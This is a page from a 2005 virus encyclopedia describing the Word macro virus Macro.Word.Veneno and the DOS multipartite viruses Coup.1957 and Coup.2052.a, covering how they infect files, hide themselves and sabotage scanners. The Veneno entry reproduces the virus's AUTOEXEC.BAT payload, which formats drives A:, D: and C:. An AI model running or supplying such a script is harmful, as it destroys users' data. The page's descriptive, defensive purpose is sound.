Virus Database


Macro.Word.Veneno

Description Macro.Word.Veneno

This is an encrypted Word macro-virus containing 12 macros: Veneno, Travel1, Travel2, AutoExec, AutoOpen, Trinitron, ArchivoAbrir, ArchivoSalir, InsertVeneno, ArchivoImprimir, ArchivoGuardarComo, and ArchivoImprimirPredeter.
The virus infects the global macros area (NORMAL.DOT) upon the opening of an infected document or Word startup (AutoOpen, AutoExec), and writes itself to documents that are saved with a new name(?) - the ArchivoGuardarComo macro.
The virus detects and removes macros of several other viruses.
At ??:30 sharp, the virus drops the DOS virus in the ATTRIB.COM file. On Friday and Saturday, if the system time (minutes) is less than 5 minutes past the hour, the virus inserts the string "** V Upon printing, if the system time seconds are more than 57, the virus appends the following text to the end of document:
Finalmente me gustaria agregar queall
El Centro de Computo de esta Universidad es una verdadera verguenza, no
nos merecemos este servicio.
>>> Shame on you!!! <<<


Upon infecting a document, if the system time seconds = 38, the virus displays the MessageBox:
Un amigo desesperado en busca de...
Khelia Monica Salda~a Diaz, me encantas y te sigo buscando...
+Donde te has escondido? Atte. Tu enamorado. (LoVe90/91)

Depending on the system random counter, the virus overwrites the files with the texts:
AUTOEXEC.BAT:
@echo off
PATH=C:;C:DOS;C:WINDOWS;C:ODI;
Echo.
Echo Insert a diskette in drive A:
Echo Press any key to continue...
pause > nul
Format a: /autotest > nul
if errorlevel 0 goto End
Format d: /autotest
Format c: /autotest
Echo U r FuCkEd!
Echo.
:end
Echo Ur mommy should be very happy of having such a g00d/obedient kid...
jaja..asswipe!!!

CONFIG.SYS:
SHELL=C:DOSCOMMAND.COM /F /P
SWITCHES = /n /f

Check other viruses! Be aware! Use Antiviral Software

Coup.1957

Description Coup.1957

This is very dangerous memory resident multipartite virus. When an infected file is executed, the virus infects the MBR of the hard drive and then returns to DOS. While loading from infected MBR the virus cuts a block of the system memory, copies itself to there, hooks INT 13h, 1Ch and returns control to the original MBR code.
By hooking INT 13h the virus realizes a stealth routine while accessing to the infected MBR. By hooking INT 1Ch (timer) the virus waits for DOS loading process, hooks INT 21h and then writes itself to the end of .COM and .EXE files (except COMMAND.COM) that are executed. The virus checks the file names and corrupts several anti-virus scanners: SCAN, MSAV, PART*, CLEAN, VSAFE, TOOLKIT, GUARD, FINDVIRU. The virus overwrites them with a trojan program that displays the message:
Coup De Main : In Childhood taught me to Love
Now that I Love Frenzied,Said me Forget !!!

Coup.2052.a

Description Coup.2052.a

This is very dangerous memory resident multipartite virus. When an infected file is executed, the virus infects the MBR of the hard drive and then returns to DOS. While loading from infected MBR the virus cuts a block of the system memory, copies itself to there, hooks INT 13h, 1Ch and returns control to the original MBR code.
By hooking INT 13h the virus realizes a stealth routine while accessing to the infected MBR. By hooking INT 1Ch (timer) the virus waits for DOS loading process, hooks INT 21h and then writes itself to the end of .COM and .EXE files (except COMMAND.COM) that are executed. The virus checks the file names and corrupts several anti-virus scanners: SCAN, MSAV, PART*, CLEAN, VSAFE, TOOLKIT, GUARD, FINDVIRU. The virus overwrites them with a trojan program that displays the message:
Coup De Main : In Childhood taught me to Love
Now that I Love Frenzied,Said me Forget !!!

Home

Viruses from A to Z
0-9 A B Ñ D E F G H I J
K L M N O P Q R S T
U V W X Y Z



Roulette
Juegos De Goku
Sklep Sportowy
Hostel, Hotell Och Pensionat I Stockholm

    Copyright © 2005 Virus-Database.com
© 2005 Virus-Database.com